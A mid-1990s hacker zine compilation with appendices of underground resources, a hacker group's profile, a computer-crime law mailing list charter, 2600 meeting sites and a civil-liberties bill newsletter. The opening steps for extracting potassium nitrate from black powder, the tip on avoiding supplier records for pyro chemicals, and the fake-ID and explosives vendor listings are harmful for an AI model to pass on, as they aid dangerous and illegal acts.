production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.
 
     Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one litre of boiling water.  Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.
 
================================================================= ====
XI.  'Cyberpunk'/Futuristic/Underground Culture
 
"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby.  It gets stored, and copied, and sent out all
over the world, and people read it.  It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace.  Eventually somebody uses it, and I know that I have the
power to change the world.  Somewhere, someplace, somebody changed
something using information I changed or created.  I helped to
change the world."  --Unknown
 
That is the attitude of many of the people who, knowingly or not, are
members of this hyped culture.  Some who may read this will see some
of their undefined beliefs, hopes and feelings reflected in the above
quote.  And, as the quote says, they will help spread it.  Somewhere,
somehow, that quote will change the world.
 
================================================================= ====
Appendix A. FTP sites with useful info: 
 
ftp.eff.org
wiretap.spies.com
hpacv.com    (mail postmaster@hpacv.com for info phirst)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu       /pub/mccoy/computer-underground/
black.ox.ac.uk                Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
glis.cr.usgs.gov             \ These two sites will give you
martini.eecs.umich.edu 3000  / whatever info you need about any city.
 
 
================================================================= ====
Apendix B. Interesting gophers:
 
gopher.eff.org 5070
gopher.wired.com
techno.stanford.edu
phred.pc.cc.cmu.edu
 
================================================================= ====
Appendix C. Informative USENET Newsgroups
 
alt.tcom
alt.forgery
alt.cyberpunk
alt.2600
alt.hackers    (need to hack into this one)
alt.security
alt.security.pgp
alt.unix.wizards
misc.security
sci.computer.security
sci.crypt
sci.electronics
rec.pyrotechnics
sci.chem
alt.locksmith
 
Also try IRC #hack.  *** WARNING: May be lame at times!!! ***
 
================================================================= ====
Appendix D. Publications and Catalogs
 
2600- a technical journal put out by hackers
 
mail:                                email:
 2600                                 2600@well.sf.ca.us
 PO Box 752
 Middle Island, NY  11953
PH:516-751-2600
 
----------------------------------------------------------------- ----
 
PHRACK
The electronic journal of hackers and phreakers.
 
Email: phrack@well.sf.ca.us
	       
----------------------------------------------------------------- ----
 
Books
 
APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C
Bruce Schneier, 1994, John Wiley & Sons.  Comprehensive.  VERY well
worth it to anyone into crypto.
 
 
Davis, Tenney L.: "Chemistry of Powder and Explosives."  
 
 
Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press)
 
Russell: "Computer Security Basics"
 
Cornwall: "The (New) Hacker's Handbook"
 
"Cyberpunk" (forget the authors)
 
----------------------------------------------------------------- ----
 
Lockpicks
(from Belisarius)
 
     American Systems
     2100 Roswell Road
     Suite 200C-223
     Marietta, GA 30062
 
Lock Pick Sets
--------------
Novice ($32.50):
11 pix, tension wrenches and a broken key extractor. Pouch.
 
Deluxe ($54.60):
16 pix, wrenches, extractor. Pocket size leather case.

Superior ($79.80):
32 pix, wrenches,extractor. Hand finished leather case.
 
----------------------------------------------------------------- ----
 
Explosives and other underground stuff
 
Loompanics is one of the major distributers of material relating to
the underground including explosives.  You can get the catalogue by
mailing:
	  Loompanics  Unlim
	  P.O. Box 1197
	  Port Townsend, Wash 98368
 
----------------------------------------------------------------- ----
 
Fake IDs, Technical Manuals on almost anything
(from CyberSorceror)
 
 
NIC/LAW ENFORCEMENT SUPPLY
500 Flournoy Lucas Road/Building #3
Post Office Box 5950
Shreveport, LA  71135-5950
Phone: (318) 688-1365     FAX:  (318) 688-1367
 
NIC offers ids of ALL types just about, as well as how-to manuals on 
EVERYTHING, posters, lock stuff, electronic sureillance stuff.
 
----------------------------------------------------------------- ----
Weapons, explosives, survival gear.
(from CyberSorceror)
 
Phoenix Systems, INC.
P.O. Box 3339
Evergreen, CO  80439
(303) 277-0305
 
Phoenix offers explosives, grenade launchers, incendiaries, tear gas
grenades, smoke grenades, pen gas sprayers, stun guns up to 120,000
volts, ballistic knives and maces(battering), armored personnel
carriers, saps/batons, booby traps, envelope clearing chemicals ..
turns envelopes transparent until it dries and leaves no marks (used 
by postal service and FBI), survival stuff, radiation pills, gasoline
stabilizers for long term storage, emergency supplies, etc, more
how-to books on more illegal stuff than you'd ever have time to read.
 
----------------------------------------------------------------- ----
 
Chemicals and lab equipment!!  Only requires SIGNATURE for proof of
age!
(from Neurophyre)
 
Hagenow Laboratories, Inc.
1302 Washington St.
Manitowoc, WI  54220
 
Send a crisp $1 bill and a request for a catalog.  Tip:  Don't order
all your pyro stuff from here.  They DO keep records.  Be safe.
 
 
================================================================= ====
Appendix E. PGP keys
 
Belisarius:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2
 
mQCNAi1FJ1MAAAEEALPDEIrmzPazAbkJ2daYnh8fy172tMmHuMPHIMaXdHWLFGjz
+XI8fJR950EGbrMKIIqsb+Xt3qhE+aQLdyggxjUuye+jTHi+JJdNg8VsULW7FvFk
YmFrObd35gQqzu9hFbUZNFxUJaRiEcViNA8bCcjQD5Fn0x/8trRiuxrAgLolAAUR
tApCZWxpc2FyaXVz
=RxKB
-----END PGP PUBLIC KEY BLOCK-----
 
 
Neurophyre:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3
 
mQCrAiw8FYMAAAEE8MHUh1VdCTeNLRr9xfzivxVODmY4Xv1VOzFmA0sCH4tB6aRA
/4+R+nzkW2ZB8N8tOa0tk+S3f20lIoWWPk0M56OaNreT0LLbM9KdOHXE5XDO/mtu
mKdy98eK3fDzXp+vVyK/mo8rhIR4uLcfA1JIuvbBdLa1d/Xq7PEKvayqYXpwvxO6
gLiy72ZWI616ijPttv2QYxSqu7rNSVzEwQy1AAUTtB9Zb3VyIGZsYXYtb3Itcml0
ZSwge05ldXJvcGhpcmV9
=FXdY
-----END PGP PUBLIC KEY BLOCK-----
 
================================================================= ====
 





			     -= H A C K E R S =-

			   Issue #3,  File #3 of 9

			   The Pursuit of Knowledge
			      Notes on The Guild

				by Route 9/11/95

	You may have been hearing much clamor about the Guild as of late.  
Maybe you haven't.  It depends what circles you hang out in.  This article
is here to tell you who we are and dispell any myths that may be floating 
around.


				[OverView]

	Just what is the Guild?  The Guild is a group of individuals that are,
quite simply, dedicated to the pursuit of knowledge.  I started the group (see
AKA's, below) as a pet project with a friend of mine (Nihil).  Actually, I 
started the group as a response to several offers to join other existing 
groups.  I felt uneasy about most of them, and decided to go out on my own, 
and do things the way *I* wanted, the first time.  The result is the Guild.
	At the time of this writing there are 10 members in the group.  We 
have had a few members step down, and one who actually just disappeared.  We
have even had one person declare a vendetta against me and the Guild for his
denial of acceptance.


			       [Members]
	

	Some of us are very vocal and 'high profile'.  Some of us are not.  
Some of us are constant alt.2600 denizens.  Some of us do not wish to wade 
through such a high traffic group, and prefer others.  Some of us only 
get online to check email.  Some of us are industry professionals, some of us 
are students.  Some are both.  We are of all different backgrounds, talents 
and interests.  The diversity is the beauty of it all.  If we all came from 
the same walks of life, did the same things, and liked the same things, we'd
be pretty useless as a group (we'd also be pretty boring).  The fact that we
are so diverse and the fact that we *can* organize under a common goal is 
saying something right there.
	To become a Guild member, all one has to do is fill out the 
application you will find at my ftpsite (see URL's below).  It is then voted 
on by all the current members (Founding members get two votes).  We are 
rather discriminating, and turn down many people.  We do not wish to get too 
large, and we do not wish to induct just anyone.  It's hard to put a 
qualifier on just what we are looking for in members.  It's partly what hard 
facts we see on the app, and partly gut feeling.  If you are serious, feel 
free to fill one out, we are always glad to see new applications.


				[Axoims]


	The creeds we gather under are the following, in order:

	1) The pursuit of knowledge
		The active and absolute pursuit of gainful and enlightening
		information.
	2) The right to privacy
		The right to be left alone, the right to actively pursue this
		privacy through encryption, obscurity, or whatever means
		necessary.
	3) The right of individualism
		The right to stand out in a crowd and show that you are
		different, and proud of it.  Also, the right to stand on your
		own, take responsibility for yourself, and not drop a dime on
		your friends and peers, should a three-letter agency press 
		you.
	4) The destruction of ignorance
		The dissemination, through discretion, of the acquired
		knowledge. The correcting of obvious wrongs of others, and the
		ability to concede that you were wrong after evidential proof
		of falsehood is provided.
	5) The support of fellow members
		The supporting, through whatever means necessary, of fellow
		members of the Guild.


			

			      [Goals and Views]
	
	What are ends to which we gather under?  It was my original goal to
get a bunch of people with similar interests together and exchnage thoughts
and ideas.  That was my original intent.  It has grown beyond that.  These 
past few months have changed my orginal vision into something much grander.  
Being in the Guild means something.  It is being able rely on a group of 
adroit people to help you out of a situation; whether it be a bit of code
you can't quite seem to get to compile, or an a pesky usenet denizen who
won't leave you alone.  Being in the Guild is knowing you have some friends 
out there in cyberspace.  Friends you can count on.  That's what it comes 
down to.
	One of my personal opinions is one of Freedom of Information.  
Information, in it's raw and pure form, wants to be free.  I am completely 
hypocritical, however.  I also beleive in the right to privacy.  How do I 
justify one to the other?  It's my belief that information *does* want to be 
free.  It tries it's hardest to be widely recognizable and distributable.  It 
doesn't hide.  If you have information you want kept secret, it's *your* 
responsibility to make *sure* it *becomes* secret, and *stays* secret.  If 
there is information I really want private *I* make sure it stays private.  
I am charged with it's secrecy.  If it was discovered by a hacker, or by some
other means, it's *my* fault for not clipping it's wings well enough...so to 
speak...Cryptogrpahy is the great enemy of Freedom of Information.  It does a 
damn good job of keeping it secure (if implemented correctly).  So, to sum it 
up, I am a firm advocate of both the Right to Privacy, and the Freedom of 
Information.  It all depends on what the content is, and how much you want it 
secured (how well you can crush it's natural desire to be free).


			      [What we AREN'T]

		In lieu of recent events, some people may have been confused 
as to what we are and what we aren't.  You should have a pretty decent idea 
of what we are.  Here's a couple things we AREN'T:
	
	An information-leeching orginization that is only here to gather up 
	'good stuff' that we couldn't get individually.
	
	Into carding, phreaking, or warez.  Translated:  we aren't into 
	getting arrested.
	
	Advocates of mailbombing, usenet spamming, mass mailing-list 
	subscriptions, etc.  Personally, I find certian denial of service 
	attacks rather interesting.  I keep my interests confined to my own 
	networks and computers, however.  If I crash my own computers, it's my 
	business.  If I crash someone else's that's fucked up.  We don't do 
	that.  It's childish and inconsisderate, to say the least.
	
	

			   [The Infinity Concept]
	
	The Infinity Concept is our electronic zine.  We try to publish it 
seasonally...We try that is....It is the personification of creeds 1 and 4.  
It is our way of widely disseminating information and aquired knowledge.
Our next issue should be out by mid-October.  
It can be found at any of our URL's...




					
				    [AKA's]
	
	This roster is current as of 9/4/95


	Name            AKA               Address                   Joined
	 ----------------------------------------------------------------- ----
	Route     (Infinity)            daemon9@netcom.com          Founding
	Nihil     (Scribe)              nihil@nwlink.com            Founding
	Carbonboy (Scott Walters)       carbon@inforamp.net         May  1995
	Squidge   (Timothy R. Matthews) T.R.Matthews@bradford.ac.uk June 1995
	Mythrandir(Jeff Thompson)       jwthomp@uiuc.edu            June 1995
	deliryum  (Deliryum)            deliryum@cdc.net            July 1995
	Alhambra  (Jeremy Rauch)        alhambra@jhu.edu            July 1995
	MrZippy   (Robert Fries)        rpfries@interaccess.com     July 1995
	Cheshire  (Justin Larue)        cheshire@nether.net         Aug  1995
	


				    [URL's]
	
	url ftp://ftp.netcom.com/pub/da/daemon9/"__the Guild__"
	url http://homepage.interaccess.com/~rpfries



			     -= H A C K E R S =-

			   Issue #3,  File #4 of 9

	    _                                _____         _____
	   | |               /\             / ____|       / ____|
	   | |              /  \           | |           | |
	   | |             / /\ \          | |           | |
	   | |____        / ____ \         | |____       | |____
	   |______|      /_/    \_\         \_____|       \_____|
	 
	   Legal         Aspects     of    Computer      Crime
		  
	    "echo subscribe lacc|mail lacc-request@suburbia.net"

REASONS FOR INCEPTION
---------------------

    The growing infusion of computers and computing devices into society
    created a legislative and common law vacuum in the 1980's. State
    prosecutors attempted to apply traditional property protection and
    deception laws to new technological crimes. By and large they were
    successful in this endeavor. There were however a very few but well
    publicized failed cases against computer "hackers" (most notable R
    vs Gold - UK House of Lords).

    In an atmosphere of increased government reliance on computer
    databases and public fear and hostility towards computerization of
    the workplace, the world's legislatures rushed to criminalize
    certain types of computer use.  Instead of expanding the scope of
    existing legislation to more fully encompass the use of computers by
    criminals, changing phrases such as "utter or write" to "utter,
    write or transmit" (the former being the prosecutions undoing in the
    well publicized Gold case) as had been done with the computerization
    of copyright law, an entirely new class of criminal conduct was was
    introduced. The computer had been seen not just as another tool that
    criminals might use in committing a crime but something altogether
    foreign and removed from the rest of society and established Law.
    The result was a series of nievely drafted, overly broad and
    under-defined statutes which criminalized nearly all aspects of
    computer use under certain conditions.

    In the the 1990's a fundamental and evolving shift in computer usage
    has started to occur.  At work it is rare now to see a white collar
    worker not in the possession of a computer. At home over one third
    of households have computer systems. The computer is no longer the
    "altogether foreign and removed from the rest of society" device it
    once was. It has come out of the domain technical specialist and
    into the main stream.

    Even our notoriously slow moving legal profession is adopting it as
    an essential tool. But there is another change. A qualitative one
    important to our discussion.

    When you connect hundreds of thousands of computers and thus the
    people that use them together you find something remarkable occurs.
    An event that you could never have predicted by merely summing the
    discrete components involved. A unique virtual society forms. Despite
    being designed with computer networking in mind computer crime 
    legislation copes very poorly with non homogeneous authorization.

    Societies are based around a common knowledge of history, beliefs,
    and current events. Each member of a society can be pinpointed as
    belonging to the society in question by the ideas, beliefs and
    knowledge they hold in common with its other members. Any new member
    to a society learns this knowledge only because it is passed onto
    them; directly by other members or indirectly via its media, works of
    literature or observation.

    Successful large scale computer networks like the Internet form for
    one reason and one reason only; information sharing. When a critical
    mass of diversity, interests, user population and information exchange
    is reached, a situation develops that mirrors in all important
    aspects a vibrant and evolving society. Members of these computer
    network societies have nearly equal ability to convey their thoughts
    to other members and do so in a timely manner without unwanted
    distortion.  This is a remarkably democratic process compared to the
    very real self censorship and top heavy direction that is so
    manifest in traditional broadcast and publishing industries.

    But unlike the physical societies that have here-to been the norm,
    the electronic network society is not isolationist. It continues to
    draw from, mesh and feed its beliefs into the traditional societies
    it was populated out of. This coupling process between computer
    networks and traditional societies is expected to continue - at
    least for English speaking countries, until a stage is reached were
    it is difficult to find any boundary between the two.

    The majority of citizens will then fall most completely under the
    gamut of the appalling drafted computer crimes legislation many
    times every day of their lives. In the vast majority of legislation
    directed to address computer crime everything which can be performed
    on a computer unless "authorized" is defined as illegal. Granted an
    individual can authorize themselves to do anything they wish with
    their own computer, but in a networked topology a typical computer
    user may use or otherwise interact with hundreds or even thousands
    of other peoples computers in any given day.  In Law it has
    previously been the case that which was not expressly forbidden was
    permitted.  Currently the digital equivalent of moving a chair is
    illegal and carries with it in most countries a 5 to 10 year prison
    term. It is a sad reflection on the legislature of the day that the
    computer medium was criminalized rather than the intent or damage to
    to the victem.

    It is unlikely that law reform will occur until current political
    concern over computer networks such as the Internet is moderated. If
    anything the push so far from political drafters has being to once
    again introduce brand new medium criminalizing legislation rather
    than revitalizing the existing codes. This unfortunate "labeled
    arrow" approach will continue as long as there exists an ill
    informed and technologically ignorant legislature that finds itself
    pliant to the whims of sensationalist media and honed to their
    dubious targets.

    So ill defined and over broad are the terms used in computer crime
    legislation that in most western countries pressing a button on a
    silicon wrist watch without permission can be construed as
    "insertion of data into a computer without authority" an offence
    which carries 10 years penalty in some countries.

    It is however within the above unfortunate lack of appropriate
    legislation, precedents and judicial guidance that judiciary,
    practitioners, prosecutors, law enforcement personnel and drafters
    of future codes have to struggle to find resolution.

    This list has been created in an attempt to mitigate the lack of
    tangible resources people involved with computer crime have at their
    disposeal. It is hoped that by bringing together knowledgeable legal
    professionals together with para-legal personnel and informed lay
    persons that information and resources relevant to the difficult
    task of analyzing, presenting in court or otherwise dealing with
    computer crime law and computer crimes may be shared and intelligent
    discussion stimulated.

    nb. this list it is also an appropriate forum to discuss computerized
	legal, law enforcement and criminology databases, such as Netmap,
	Watson, PROMIS, Lexis, APAIS, CRIM-L, et cetera.

GUIDELINES
----------

In order to keep the semantic content high on this list, please consult
the following before posting:


DO POST                                 DON'T POST
-------                                 ----------

Un/reported decisions.                  Personal insults.
Commentaries on cases.                  Signatures >4 lines.
Reviews on relevant books.              Quoted replies with more than 30%
Relevant journal articles.              quoted from the original.
Information about proposed legislation. Short questions, or questions which
Full text of CC legislation.            otherwise do not convey useful
Judicially defined terms.               information in their own right.
Articles on new arrests or              Gossip about the moderator.
cases.                                  Articles about computer (in)security,
Detailed questions.                     they should be sent to:
Intelligent commentary.                 "best-of-security@suburbia.net"
Personal experiences with computer      "breaking into a computer is the same
crime.                                   as...."
Very well thought out analogies.        Petitions (if you think they are
Relevant transcripts.                   exceptionally relevant, send them to
Defence or prosecution strategy.        the moderator, who may post them).
Relevant papers, thesis.                Chain letters.
Conference announcements and details.   Advertising material.
Locations of legal resources.           Ethical considerations that are only
Computer forensics information.         "opinion".
Trial/court dates, verdicts etc.        Content free news reports or
Reviews of legal software.              articles. 
Pointers to any of the above.           Abusive, antagonistic or otherwise,
Cross post relevant information from    non information rich or constructive
other lists or news groups.             phrases.
Relevant affidavits, court documents.   Quotes from Dan Quayle.

SUBSCRIBING
-----------

Send mail to: 

	lacc-request@suburbia.net

with the body of:

	subscribe lacc

UNSUBSCRIBING
-------------

Send mail to:

	lacc-request@suburbia.net

with the body of:

	unsubscribe lacc

POSTING
-------

To send a message to the list, address it to:

	lacc@suburbia.net

REPLYING
--------

If you are replying to a message already on the LACC list using your
mail programs reply facility you will almost certainly have to change
the reply address to lacc@suburbia.net. This is because the LACC mailing
list program is configured to have return replies sent no "nobody" in
order to avoid receiving the replies of "vacation" programs which
automatically send email saying "I've gone to the moon for two weeks to
hunt rare bits".

-- 
+----------------------------------+----------------------------- ------------+
|          Julian Assange          | "if you think the United  States has    |
|                                  |  has stood still, who built the largest |
|        proff@suburbia.net        |  shopping centre in the world?" - Nixon |
+----------------------------------+----------------------------- ------------+


				-= H A C K E R S =-

			      Issue #3,  File#5 of 9

				   2600 MEETINGS


North America

Ann Arbor, MI
   Galleria on Souh University

Austin
   Northcross Mall, across the skating rink from the food court, next
   to Pipe World.

Baltimore
   Baltimore Inner Harbor, Harborplace Food Court, Second Floor,
across
   from the Newscenter, Payphone: (410) 547-9361.

Baton Rouge, LA
   In The LSU Union Building, between the Tiger Pause and Swensen's
   Ice Cream, next to the payphone. Payphone numbers:(504) 387-9520
   9520, 9538, 9618, 9722, 9733, 9735.

Bloomington, MN
   Mall of America, north side food court, across from Burger King
and
   the bank of payphones that don't take incoming calls.

Boise, ID
   Student Union building at Boise State University near payphones.
   Payphone number:(208) 342-9432, 9559, 9700, 9798

Boston, MA
   Prudential Center Plaza, Terrace Food Court, Payphones:(617) 236-
   6582, 6583, 6584, 6585.

Chicago, IL
   3rd Coast Cafe, 1260 North Dearborn.

Cincinnati
   Kenwood Town Center, food court.

3 Clearwater, FL
   Clearwater Mall, near the food court. Payphones:(813) 796-9706,
   9707, 9708, 9813.

Cleveland
   CoventryAraica in Cleveland Heights

Dallas
Mama's Pizza, northeast corner of Campbell Rd. and Preston Rd. in
   North Dallas, first floor of the two story strip section. 7pm.
   Payphone:(214) 931-3850.

Danbury, CT
   Danbury Fair Mall, off Exit 4 of I-84, in food court. Payphones:
   (203) 748-9995

Hazelton, PA
   Lural Mall in the new section by phones. Payphones:(717) 454-9236,
   9246,9365.

4 Houston
   Galleria Mall, 2nd story overlooking the skating rink.

Kansas City
   Foor Court at the Oak Park Mall in Overland Park, Kansas.

Los Angeles
   Union Station, corner of Macy & Alameda. Inside main entrance by
   bank of phones. Payphones:(213) 972-9358,9388, 9506, 9519, 9520,
   625-9923, 9924; 614-9849, 9872, 9918, 9926.

Louisville, KY
   The Mall, St. Matthew's food court.

Madison, WI
   Union South (227 S. Randall St.) on the main level by the
payphones
   Payphones: (608) 251-9746, 9914, 9916, 9923.

Nashville
   Bellevue Mall in Bellevue, in the food court.

New York City
   Citicorp Center, in the loby, near the payphones, 153 E 53rd St.,
   between Lexington & 3rd. Payphones: (212) 223-9011, 8927; 308-
   8044, 8162

Ottawa, ONT (Canada)
   Cafe Wim on Sussex, a block down from Rideau Street. 7pm.

Philadephia
   30th Streek Amtrak Station at 30th & Market, under the "Stairwell
7"
   sign. Payphones (215) 222-9880, 9681, 9779, 9799, 9632; 387-9751.

Pittsburgh
   Parkway Center Mall, south of downtown, on Route 279. In the food
   courth. Payphone: (412)928-9926, 9927, 9934.

Portland, OR
   Lloyd Center Mall, second leavel at the food court.

6 Poughkeepsie, NY
   South Hills Mall, off Route 9. By the payphones in front of Radio
   Shack, next to the food court.

Raleigh, NC
   Crabtree Valley Mall, food court.

Rochester, NY
   Marketplace Mall food court.

St. Louis
   Galleria, Highway 40 and Brentwood, lower level, food court area,
   by the theatres.

Sacramento
   Downtown Plaza food court, upstairs by the theatre. Payphones:
   (916) 442-9543, 9644.

San Fransico
   4 Embarcadero Plaza(inside). Payphones: (415) 398-9803, 9804,
   9805, 9806.

Seattle
Washinton State Covention Center, first floor. Payphones: (206)
   220-9774, 9775, 9776, 9777.

Washington DC
   Pentagon City Mall in the food court.

Europe & South America


Buenos Aires, Argetina
   In the bar at San Jose 05.

London, England
   Trocadero Shopping Center (near Picadilly Circus)next to VR
   machines. 7pm to 8pm.

Munich, Germany
   Hauptbahnhof (Central Station), first floor, by Burger King and
the
   payhpones.(one stop on the S-Bahn from Hackerbruecke -
   Hackerbridge!) Birthplace of Hacker-Pschorr beer. Payphones: +49-
   89-591-835. +49-89-558-541, 542, 543, 544, 545.

Granada, Spain
   At Kiwi Pub in Pedro Antonio de Alarcore Street.

Halmstad, Sweden
   At the end of the town square(Stora Torget), to the right of the
bakery
   (Tre Hjartan). At the payphones.

All meetings take place on the first Friday of the month from
approximately 5pm to 8pm local time unless otherwise noted. To start
a meeting in your city, leave a message and phone number at
(516)751-2600, or send email to: meetings@2600.com
  

This PHiLe courtesy of the 2600 Web Site

FuSIoN

----------------------------------------------------------------- -------------
		    T H E   C R i M E   S Y N D i C A T E
				 NPi/TcS/SUi                      

fu-sion \'fyu-zhen\ n, the union of atomic nuclei resulting in the 
release of enormous quantities of energy when certain light elements unite.
----------------------------------------------------------------- -------------




			       -= H A C K E R S =-

			     Issue #3,  File #6 of 9
			      
================================================================= ==========
				  BillWatch 18                                  

       VTW BillWatch: A weekly newsletter tracking US Federal legislation       
	    affecting civil liberties.  BillWatch is published every            
	       Friday evening as long as Congress is in session.               

			    Congress is: in session                            

		 Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995                 

	Please widely redistribute this document with this banner intact        
	      Redistribute no more than two weeks after above date              
		  Reproduce this alert only in relevant forums                  

	Distributed by the Voters Telecommunications Watch (vtw@vtw.org)        
_________________________________________________________________ __________

TABLE OF CONTENTS

	'-'  denotes quiet issue (no movement this week)
	'+'  denotes movement this week on an issue
	'++' denotes movement this week with an action for YOU to do

	+ Summary of Internet Censorship legislation
	+ Changes in US policy on cryptography
		Review of workshop at NIST Sep 15th
		Text of ACLU position on encryption
		Status: "Clipper II" ramrodding is progressing
	- HR1978, S n.a. (Internet Freedom and Family Empowerment Act)
		Status: In conference
	- HR1004, S314  (1995 Communications Decency Act)
		Status: In conference
	- HR n.a., S714  (Child Protection, User Empowerment, and Free
				Expression in Interactive Media Study Act)
		Status: In conference
	- Last-minute provisions of the Manager's Mark amendment to HR1555
		Status: In conference
	- HR n.a., S892 (Protection of Children from Computer Pornography Act)
		Status: In committee
	- HR n.a., S974 (Anti-Electronic Racketeering Act)
		Status: In committee
	+ HR n.a., S1237 (Child Pornography Prevention Act
		Text of S1237
		Statement of introduction of S1237 (Hatch)
		Status: In committee (Judiciary)

	- Subscription Information

_________________________________________________________________ __________
SUMMARY OF INTERNET CENSORSHIP LEGISLATION

The four different pieces of legislation that address Internet regulation
are still waiting for conference committee consideration.  With the budget
as the current Congressional priority, it isn't likely the fate of the
Internet will be considered for several weeks.

VTW is still collecting the signatures of businesses and bulletin boards
that wish to participate in the joint letter to be sent to Congress urging
parental control (instead of censorship) as a means of approaching the
Internet.  VTW urges you to contact your Internet service provider along
with any business that use the Internet to signon to this letter.  Details
can be found at the http://www.vtw.org/cdaletter/
or by sending mail to vtw@vtw.org with "send cdaletter" in the subject line.

_________________________________________________________________ __________
CHANGES IN US CRYPTOGRAPHY POLICY

VTW has been chronicaling the government's attempts at forcing Clipper II
onto the public and industry.  Of course, it is still extremely unpopular.
At the Sep. 6th and 7th NIST workshop, industry and public interest
groups panned the plan and small working groups setup by NIST to evaluate
the criteria unhappily participated, even openly revolting in some instances.

On Sep 15th, NIST held another workshop to discuss the FIPS (Federal
Information Processing Standard) that would embody Clipper II (also
know as Commercial Key Escrow).  Believe it or not, this meeting was not
a repeat of the Sep 6th/7th meeting.  Several attendees noticed significant
differences:

HEIGHTENED GOVERNMENT PRESENCE
At the Sep 6th/7th workshop, dissent among industry and public
representatives interfered with NIST's attempts at having a discussion
about the specifics of Clipper II.  Simply put, industry and the public
advocates didn't like the plan.  Therefore discussions of the details
were fruitless.  One smaller working group simply refused to work on
the details and issued a statement condemning the whole Clipper II plan.

The government upped the number of Federal participants at the Sep. 15th
meeting in order to prevent the repeat of such an event.  Several public
advocates noticed a high percentage of government-provided participants in
the working groups.  One civil liberties advocate noted that he had never
seen so many NSA individuals identifying themselves in public before.

Needless to say the tactic worked.  Little in the way of opposition to
the plan was voiced. 

BURNOUT AMONG INDUSTRY AND PUBLIC REPRESENTATIVES
Having been through this Kafka-esque exercise a mere two years ago with
the original Clipper plan, industry and public advocates are showing
signs of burnout.  It's fairly clear that their concerns are not being
listened to.  Both the public and the industry clearly sent a message to
the Clinton Administration when the original Clipper was proposed. 
Said F. Lynn McNulty of NIST in the New York Times Magazine (6/12/94), "We
received 320 comments, only 2 of which were supportive."

NIST made the Clipper Chip a government standard anyway, and it flopped
in the marketplace.  How many of those Clipper-phones do you see running
around?  The government's so-called "stupid criminals" are just falling
over themselves to buy them, aren't they?  NIST has stated that it has
already been decided to make Clipper II a standard, before receiving any
public input.  Is this how democracy is supposed to work?

COMMERCIAL CHEERLEADING FROM SELECT INDUSTRY INDIVIDUALS
If you're wondering how the Clinton administration can get away with
pushing such a disastrous proposal again, look no further than select
members of the hardware and software industry.  Several companies that
make both security software, hardware devices and several key escrow
companies are pushing Clipper II because they incorrectly believe that
the government will not make it mandatory, and because they believe
the industry wants key escrow.

VTW believes they have it half-right: industry wants key escrow, though
not on the Clinton Administration's terms.  It is clear, however, that
the Administration will not allow key-escrow to be a voluntary program.

The EPIC (Electronic Privacy Information Center) has proved that the
government has enough common sense to know that key escrow is going to be
unpopular and will have to be forced on the marketplace. (See FOIA'd
documents at URL:http://www.epic.org/crypto/).

Never the less, several companies who want to produce hardware key
escrowed devices, key escrowed software, and become escrow holders have
become the champions of the Clipper II (Commercial Key Escrow)
program.  With their support, VTW predicts that the Clinton
Administration will ratify Clipper II as a FIPS standard over the
objections of industry and public.

Stay tuned to BillWatch for progress on Clipper II.
_________________________________________________________________ __________

Internet Freedom and Family Empowerment Act (HR 1978, S n.a.)

		*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
	HR 1978 is an attempt to recognize the unique medium that is
	online systems and avoid legislating censorship.  It would:
	 -prohibit the FCC from regulating constitutionally-protected
	  online speech
	 -absolve sysops and services from liability if they take
	  good faith measures to screen their content or provide
	  parental-screening software

	See directions below for obtaining analyses from various
	organizations.

House sponsors and cosponsors: Cox (R-CA), Wyden (D-OR), Matsui (D-CA),
	White (R-WA), Stupak (D-MI), Rohrabacher (R-CA)

House status:
	HR 1978 was passed 8/4/95 by the House in a vote (421-4).
	
Where to get more info:
	Email:  vtw@vtw.org (with "send hr1978" in the subject line)
	Gopher: gopher -p 1/vtw/exon gopher.panix.com
	WWW:    http://www.panix.com/vtw/exon

_________________________________________________________________ __________

1995 COMMUNICATIONS DECENCY ACT (CDA) (Passed Senate, HR 1004)

		*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
	The CDA would criminalize electronic speech currently protected
	in print by the First Amendment.

House CDA sponsors: Johnson (D-SD)

House status:
	HR1004 will probably never leave committee.

Senate status:
	The Senate affirmed the Communications Decency Act (84-16)
	as amended to the Telecommunications Reform bill (S 652).

Where to get more info:
	WWW:    http://www.panix.com/vtw/exon
		http://www.eff.org/
		http://www.cdt.org/
		http://epic.org/free_speech
	Gopher: gopher -p 1/vtw/exon gopher.panix.com
		gopher gopher.eff.org
	Email:  vtw@vtw.org (with "send cdafaq" in the subject line)
		cda-status@cdt.org
		cda-info@cdt.org

_________________________________________________________________ __________
Child Protection, User Empowerment, and Free Expression in Interactive
Media Study Act (Amendment to HR1555 in the House, S 714)

		*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
	Would direct the Department of Justice to study whether current
	law is sufficient to cover enforcement of existing obscenity
	laws on computers networks.

Senate sponsors: Leahy (D-VT)

Senate status:
	Currently unattached to any legislation; attempted attachment to
	S.652 but failed (6/14/95).

House sponsors:  Klink (D-PA)

House status:
	Amended to HR 1555 in committee.

_________________________________________________________________ __________

Last-minute provisions of the Manager's Mark amendment to HR1555 (added to
	HR1555 at the last minute)

		*** THIS BILL IS IN CONFERENCE COMMITTEE ***

Description:
	Criminalizes many forms of constitutionally-protected speech
	when they are expressed online.

House sponsors:  Unknown

House status:
	Amended to HR 1555 through the Manager's Mark on 8/4/95.

_________________________________________________________________ __________

1995 Protection of Children from Computer Pornography Act (S 892)

Description:
	Would make Internet Service Providers liable for shielding
	people under 18 from all indecent content on the Internet.
	
